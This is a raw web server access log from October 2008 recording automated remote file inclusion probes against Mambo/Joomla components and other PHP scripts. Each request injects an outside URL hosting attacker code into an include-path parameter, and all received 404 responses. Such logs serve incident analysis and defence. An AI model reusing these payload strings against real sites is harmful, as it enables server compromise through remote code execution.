195.3.194.35 - - [22/Oct/2008:00:37:31 -0400] "GET /logs/access_log.Q108081900%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://bugisku.com/chid.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.3.194.35 - - [22/Oct/2008:00:37:37 -0400] "GET /logs/error_log.Q108101400%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://bugisku.com/chid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
222.128.244.119 - - [22/Oct/2008:00:38:10 -0400] "GET /logs/error_log.Q108071000//?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.172.9.3 - - [22/Oct/2008:00:38:10 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://playwithyourmind.com/vnc/idfeel.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
222.128.244.119 - - [22/Oct/2008:00:38:11 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.172.9.3 - - [22/Oct/2008:00:38:11 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://playwithyourmind.com/vnc/idfeel.txt?? HTTP/1.1" 404 256 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
222.128.244.119 - - [22/Oct/2008:00:38:11 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:12 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.172.9.3 - - [22/Oct/2008:00:38:13 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://playwithyourmind.com/vnc/idfeel.txt?? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
66.172.9.3 - - [22/Oct/2008:00:38:14 -0400] "GET /logs/access_log.Q108081500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://playwithyourmind.com/vnc/idfeel.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
222.128.244.119 - - [22/Oct/2008:00:38:15 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:16 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:16 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:17 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:20 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:23 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:24 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:24 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:25 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
85.119.155.214 - - [22/Oct/2008:00:38:26 -0400] "GET /logs/error_log.Q108100200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://outofthelair.com/safe1.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
85.119.155.214 - - [22/Oct/2008:00:38:26 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://outofthelair.com/safe1.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
85.119.155.214 - - [22/Oct/2008:00:38:27 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://outofthelair.com/safe1.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
222.128.244.119 - - [22/Oct/2008:00:38:28 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:28 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:31 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:32 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:37 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:37 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
70.38.12.204 - - [22/Oct/2008:00:38:39 -0400] "GET //appserv/main.php?appserv_root=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
222.128.244.119 - - [22/Oct/2008:00:38:40 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:41 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:41 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:42 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:43 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:43 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:44 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:44 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:45 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:46 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:46 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:52 -0400] "GET /logs/error_log.Q108071000//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:53 -0400] "GET /logs/error_log.Q108071000//akocomments.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:53 -0400] "GET /logs/error_log.Q108071000//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:54 -0400] "GET /logs/error_log.Q108071000//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:57 -0400] "GET /logs/error_log.Q108071000//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:38:58 -0400] "GET /logs/error_log.Q108071000//components/calendar/com_calendar.php?absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:01 -0400] "GET /logs/error_log.Q108071000//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:01 -0400] "GET /logs/error_log.Q108071000//components/com_calendar.php?absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:02 -0400] "GET /logs/error_log.Q108071000//components/com_cpg/cpg.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:02 -0400] "GET /logs/error_log.Q108071000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:03 -0400] "GET /logs/error_log.Q108071000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:04 -0400] "GET /logs/error_log.Q108071000//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:04 -0400] "GET /logs/error_log.Q108071000//components/com_forum/download.php?phpbb_root_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:05 -0400] "GET /logs/error_log.Q108071000//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:05 -0400] "GET /logs/error_log.Q108071000//components/com_hashcash/server.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:06 -0400] "GET /logs/error_log.Q108071000//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:06 -0400] "GET /logs/error_log.Q108071000//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
193.136.63.5 - - [22/Oct/2008:00:39:07 -0400] "GET /logs/access_log.Q108081500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
222.128.244.119 - - [22/Oct/2008:00:39:10 -0400] "GET /logs/error_log.Q108071000//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:14 -0400] "GET /logs/error_log.Q108071000//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:14 -0400] "GET /logs/error_log.Q108071000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:15 -0400] "GET /logs/error_log.Q108071000//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:15 -0400] "GET /logs/error_log.Q108071000//components/com_mambowiki/MamboLogin.php?IP=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.160.79.6 - - [22/Oct/2008:00:39:17 -0400] "GET /logs/access_log.Q108091500//includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
211.160.79.6 - - [22/Oct/2008:00:39:17 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
211.160.79.6 - - [22/Oct/2008:00:39:17 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
211.160.79.6 - - [22/Oct/2008:00:39:17 -0400] "GET /logs/access_log.Q108091600//includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
222.128.244.119 - - [22/Oct/2008:00:39:18 -0400] "GET /logs/error_log.Q108071000//components/com_minibb.php?absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:19 -0400] "GET /logs/error_log.Q108071000//components/com_moodle/moodle.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:20 -0400] "GET /logs/error_log.Q108071000//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:20 -0400] "GET /logs/error_log.Q108071000//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:21 -0400] "GET /logs/error_log.Q108071000//components/com_mospray/scripts/admin.php?basedir=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:21 -0400] "GET /logs/error_log.Q108071000//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:22 -0400] "GET /logs/error_log.Q108071000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:23 -0400] "GET /logs/error_log.Q108071000//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:23 -0400] "GET /logs/error_log.Q108071000//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:24 -0400] "GET /logs/error_log.Q108071000//components/com_performs/performs.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:24 -0400] "GET /logs/error_log.Q108071000//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:25 -0400] "GET /logs/error_log.Q108071000//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
70.38.12.204 - - [22/Oct/2008:00:39:25 -0400] "GET /logs/access_log.Q108092900//appserv/main.php?appserv_root=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
70.38.12.204 - - [22/Oct/2008:00:39:25 -0400] "GET //appserv/main.php?appserv_root=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
70.38.12.204 - - [22/Oct/2008:00:39:25 -0400] "GET /logs//appserv/main.php?appserv_root=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
222.128.244.119 - - [22/Oct/2008:00:39:25 -0400] "GET /logs/error_log.Q108071000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:26 -0400] "GET /logs/error_log.Q108071000//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:27 -0400] "GET /logs/error_log.Q108071000//components/com_simpleboard/image_upload.php?sbp=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
201.22.6.28 - - [22/Oct/2008:00:39:28 -0400] "GET /logs/access_log.Q108082800/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.22.82.135 - - [22/Oct/2008:00:39:29 -0400] "GET /index.php?sourcedir=http://2excel.com.au/readme1.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
62.110.217.58 - - [22/Oct/2008:00:39:29 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.110.217.58 - - [22/Oct/2008:00:39:30 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.110.217.58 - - [22/Oct/2008:00:39:30 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.128.244.119 - - [22/Oct/2008:00:39:30 -0400] "GET /logs/error_log.Q108071000//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:31 -0400] "GET /logs/error_log.Q108071000//components/com_smf/smf.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:31 -0400] "GET /logs/error_log.Q108071000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:32 -0400] "GET /logs/error_log.Q108071000//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:35 -0400] "GET /logs/error_log.Q108071000//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:36 -0400] "GET /logs/error_log.Q108071000//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:36 -0400] "GET /logs/error_log.Q108071000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:37 -0400] "GET /logs/error_log.Q108071000//components/minibb/index.php?absolute_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:37 -0400] "GET /logs/error_log.Q108071000//database.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:38 -0400] "GET /logs/error_log.Q108071000//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
70.38.12.204 - - [22/Oct/2008:00:39:38 -0400] "GET /logs/access_log.Q108061400//appserv/main.php?appserv_root=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
222.128.244.119 - - [22/Oct/2008:00:39:38 -0400] "GET /logs/error_log.Q108071000//includes/adminAvatars.php?GlobalSettings[templatesDirectory]=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:39 -0400] "GET /logs/error_log.Q108071000//includes/adminSmileys.php?GlobalSettings[templatesDirectory]=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.128.244.119 - - [22/Oct/2008:00:39:40 -0400] "GET /logs/error_log.Q108071000//includes/functions_cms.php?phpbb_root_path=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.160.79.6 - - [22/Oct/2008:00:39:40 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
211.160.79.6 - - [22/Oct/2008:00:39:40 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
211.160.79.6 - - [22/Oct/2008:00:39:40 -0400] "GET /logs/access_log.Q108091500//includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
222.128.244.119 - - [22/Oct/2008:00:39:40 -0400] "GET /logs/error_log.Q108071000//includes/move.php?GlobalSettings[templatesDirectory]=%20http://www.asa-auto.ba/mambo/cache/scan/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.160.79.6 - - [22/Oct/2008:00:39:41 -0400] "GET /logs/access_log.Q108091600//includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
